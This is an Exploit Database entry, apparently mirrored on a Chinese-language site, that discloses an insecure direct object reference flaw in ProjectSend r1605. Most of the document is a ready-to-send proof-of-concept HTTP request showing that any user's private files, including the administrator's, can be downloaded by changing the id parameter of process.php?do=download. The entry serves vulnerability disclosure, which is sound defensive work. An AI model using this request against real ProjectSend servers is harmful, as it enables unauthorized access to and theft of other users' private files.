projectSend r1605 – Private file download

• Exploit Database
• 20 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-05-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51400/

• Exploit Title: projectSend r1605 - Private file download
  Application: projectSend
  Version: r1605
  Bugs:IDOR
  Technology: PHP
  Vendor URL: https://www.projectsend.org/
  Software Link: https://www.projectsend.org/
  Date of found: 24-01-2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  
  Technical Details & POC
  ========================================
  
  1.Access to private files of any user, including admin
  
  
  just change id
  
  
  
  GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1
  Host: localhost
  sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Linux"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost/manage-files.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f
  Connection: close